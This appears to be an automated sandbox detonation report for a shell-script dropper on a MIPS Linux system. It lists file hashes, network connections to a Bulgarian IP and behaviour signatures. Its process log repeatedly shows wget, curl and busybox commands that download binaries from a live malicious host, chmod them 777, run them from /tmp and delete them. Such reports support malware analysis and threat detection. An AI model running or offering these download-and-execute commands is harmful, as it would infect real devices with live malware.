[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/chmod

[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF

[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/rm

[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/wget

[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/chmod

[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs

[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/rm

[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/wget

[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/chmod

[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa

[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/rm

[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/wget

[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/chmod

[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB

[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/rm

[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/chmod

[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S

[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/rm

[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/usr/bin/wget

[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/chmod

[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo

[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/rm

[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/wget

[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/chmod

[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K

[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/rm

[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/wget

[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/chmod

[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f

[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/rm

[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/wget

[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/chmod

[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU

[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/rm

[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/wget

[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/chmod

[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD

[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/rm

[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/wget

[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/chmod

[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF

[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/rm

[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/wget

[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/chmod

[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0

[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/rm

[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/chmod

[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K

[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/bin/rm

[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]

/usr/bin/wget

[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/chmod

[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f

[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/bin/rm

[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]

/usr/bin/wget

[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/chmod

[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU

[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/rm

[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/wget

[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/chmod

[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo

[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/rm

[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/wget

[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/chmod

[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF

[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/rm

[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/wget

[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/chmod

[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0

[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/rm

[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/chmod

[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD

[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/rm

[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/wget

[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/chmod

[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/rm

[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/wget

[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/chmod

[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF

[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/rm

[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/wget

[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/chmod

[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs

[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/rm

[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/wget

[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/chmod

[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa

[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/rm

[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/wget

[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/chmod

[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/rm

[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/wget

[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/chmod

[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB

[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/rm

[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/chmod

[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S

[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/rm

[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/828-1-0xb66a6000-0xb66b7044-memory.dmp

memory/846-2-0xb6708000-0xb6719044-memory.dmp

memory/858-3-0xb673f000-0xb6750044-memory.dmp

memory/884-4-0xb6747000-0xb6758044-memory.dmp

memory/891-5-0xb673a000-0xb674b044-memory.dmp

memory/923-6-0xb673b000-0xb674c044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-28 02:34

Reported

2024-10-28 02:36

Platform

debian9-mipsbe-20240611-en

Max time kernel

147s

Max time network

152s

Command Line

[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms N/A
N/A /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt N/A
N/A /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF N/A
N/A /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs N/A
N/A /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa N/A
N/A /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB N/A
N/A /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S N/A
N/A /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo N/A
N/A /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K N/A
N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU N/A
N/A /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD N/A
N/A /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF N/A
N/A /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 N/A
N/A /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K N/A
N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU N/A
N/A /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo N/A
N/A /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF N/A
N/A /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 N/A
N/A /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD N/A
N/A /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt N/A
N/A /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF N/A
N/A /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs N/A
N/A /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa N/A
N/A /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms N/A
N/A /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB N/A
N/A /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
